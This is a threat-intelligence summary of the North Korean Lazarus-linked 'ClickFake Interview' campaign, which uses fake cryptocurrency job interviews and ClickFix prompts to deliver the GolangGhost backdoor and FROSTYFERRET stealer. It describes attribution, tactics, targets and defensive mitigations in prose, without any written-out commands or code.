Full Report
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
Analysis Summary
# Threat Actor: Contagious Interview (Lazarus Group sub-activity)
## Attribution & Identity
Attributed to the **Lazarus Group**, which is known to be sponsored by the **Reconnaissance General Bureau (RGB)** of the **Democratic People's Republic of Korea (DPRK)** (North Korea).
**Known Aliases/Associated Groups:**
* Contagious Interview
* DeceptiveDevelopment
* DEV\#POPPER
* Famous Chollima
* Associated with the broader Lazarus Group activities, including Operation Dream Job and similar fake job interview schemes.
## Activity Summary
This activity, recently codenamed **ClickFake Interview**, represents a continuation of the Contagious Interview campaign, active since at least December 2022. The core activity involves using social engineering tactics—specifically the **ClickFix** methodology—through **fake job offers** distributed via LinkedIn or X to attract targets. Victims are lured into downloading malware disguised as necessary software (e.g., videoconferencing tools) or open-source projects. In the latest iteration, victims are directed to a fake video interviewing service (Willo). The operation has shown a **significant operational shift** by primarily targeting **Centralized Finance (CeFi) entities** rather than the previously documented focus on Decentralized Finance (DeFi) entities. This activity is also linked to the broader DPRK fraudulent IT worker scheme expanding into Europe.
## Tactics, Techniques & Procedures
- **Social Engineering:** Utilizes fake job offers and impersonation (luring targets via LinkedIn/X).
- **ClickFix Technique:** Exploits user trust during a "video interview" process. When a user attempts to enable their camera, they are presented with a fake error requiring a "driver update," prompting them to download and execute malicious files via command-line instructions.
- **Execution (Windows):** Targets are prompted to open Command Prompt and execute a `curl` command to fetch a Visual Basic Script (VBS), which then runs a batch script to launch the backdoor.
- **Execution (macOS):** Targets are prompted to open Terminal and run a `curl` command to fetch a shell script, which then runs a second shell script to execute the stealer module and the backdoor.
- **Credential Harvesting:** The FROSTYFERRET stealer module displays a fake "Chrome update" window, prompting the user to enter their system password, which is exfiltrated.
## Targeting
- **Sectors:** Cryptocurrency sector, specifically **Centralized Finance (CeFi) entities**. This is a notable shift from prior focus on DeFi.
- **Geography:** The expansion of related IT worker schemes indicates an increased focus on **Europe**, although previous campaigns targeted US victims as well.
- **Victims:** Impersonated major cryptocurrency companies including **Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit**. Positions targeted included **business development, asset management, product development, and decentralized finance specialists**, rather than just traditional software development roles.
## Tools & Infrastructure
- **Malware Families Used:**
- **GolangGhost:** A previously undocumented Go-based backdoor used to facilitate remote control and data theft (file upload/download, host info gathering, browser data exfiltration).
- **FROSTYFERRET (aka ChromeUpdateAlert):** A stealer module deployed on macOS targeting system passwords via a fake browser prompt.
- **FERRET:** Malware family previously linked to Lazarus Group's click-based campaigns, which leads to the deployment of the GolangGhost backdoor in this iteration.
- **Infrastructure:** Exfiltration destination for stolen credentials was observed to be a **Dropbox location**.
## Implications
This activity demonstrates the Lazarus Group's continuous adaptation to current economic trends (cryptocurrency industry) and operational security developments (using ClickFix instead of just direct file downloads). The shift in targeting from DeFi to CeFi indicates a move toward potentially higher-value centralized institutions. Furthermore, the widening scope of the associated IT worker scheme into Europe highlights a sustained effort by North Korea to generate illicit revenue globally, utilizing social engineering and exploiting common work-from-home/BYOD environments.
## Mitigations
- **Incident Response:** Be aware of the specific ClickFix workflow used during job interviews involving fake driver updates or required software installation.
- **Endpoint Security:** Implement robust endpoint detection and response (EDR) capable of detecting and blocking suspicious command-line executions (`curl` commands initiating scripts) and VBS/batch file execution chains.
- **User Training:** Conduct targeted security awareness training focusing on sophisticated, multi-step social engineering attacks like ClickFix, especially for hiring managers and new employees in time-sensitive recruitment processes.
- **System Hardening:** Review BYOD policies; deploy security tools and logging on all personal devices used for corporate work where possible, as these devices are being specifically targeted.
- **Credential Security:** Implement Multi-Factor Authentication (MFA) widely, as password theft alone may not grant access to critical network resources.